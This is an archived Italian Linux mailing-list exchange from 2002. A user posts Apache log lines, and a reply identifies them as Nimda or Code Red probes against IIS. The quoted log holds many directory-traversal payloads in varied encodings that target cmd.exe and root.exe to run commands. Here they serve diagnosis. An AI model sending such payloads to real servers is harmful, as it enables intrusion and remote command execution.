R: [glux] Log di Apache

maurizio.andreotti@katamail.com maurizio.andreotti@katamail.com
Mon, 23 Sep 2002 15:19:34 +0200 

qualcuno -senza cattive intenzione normalmente - con un pc infettato da
nimda / code red ha cercato di infettare il tuo server IIS.

ciao,
m.

> -----Messaggio originale-----
> Da: glux-admin@lists.linux.it [mailto:glux-admin@lists.linux.it]Per
> conto di massimo
> Inviato: Monday, September 23, 2002 3:16 PM
> A: glux@lists.linux.it
> Oggetto: [glux] Log di Apache
>
>
> Ciao a tutti,
> qualcuno mi puo' commentare questo pezzo di log di Apache??
> Grazie.
> Alla prossima.
> 	MAX
>
>
> 217.219.90.141 - - [22/Sep/2002:14:30:35 +0200] "GET
> /scripts/root.exe?/c+dir
> HTTP/1.0" 404 295
> 217.219.90.141 - - [22/Sep/2002:14:30:38 +0200] "GET
> /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 293
> 217.219.90.141 - - [22/Sep/2002:14:30:41 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 217.219.90.141 - - [22/Sep/2002:14:30:44 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 217.219.90.141 - - [22/Sep/2002:14:30:51 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
> 217.219.90.141 - - [22/Sep/2002:14:31:00 +0200] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 334
>
>
> 217.222.116.163 - - [23/Sep/2002:08:52:14 +0200] "GET
> /scripts/root.exe?/c+dir
> HTTP/1.0" 404 295
> 217.222.116.163 - - [23/Sep/2002:08:52:45 +0200] "GET
> /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 293
> 217.222.116.163 - - [23/Sep/2002:08:52:47 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 217.222.116.163 - - [23/Sep/2002:08:52:49 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 217.222.116.163 - - [23/Sep/2002:08:52:51 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
> 217.222.116.163 - - [23/Sep/2002:08:52:53 +0200] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 334
> 217.222.116.163 - - [23/Sep/2002:08:52:55 +0200] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 334
> 217.222.116.163 - - [23/Sep/2002:08:52:57 +0200] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 350
> 217.222.116.163 - - [23/Sep/2002:08:52:58 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
> 217.222.116.163 - - [23/Sep/2002:08:53:03 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
> 217.222.116.163 - - [23/Sep/2002:08:53:05 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
> 217.222.116.163 - - [23/Sep/2002:08:53:28 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
> 217.222.116.163 - - [23/Sep/2002:08:53:33 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300
> 217.222.116.163 - - [23/Sep/2002:08:53:38 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300
> 217.222.116.163 - - [23/Sep/2002:08:58:41 +0200] "-" 408 -
>
> _______________________________________________
> glux mailing list
> glux@lists.linux.it
> http://lists.linux.it/listinfo/glux
> http://www.lecco.linux.it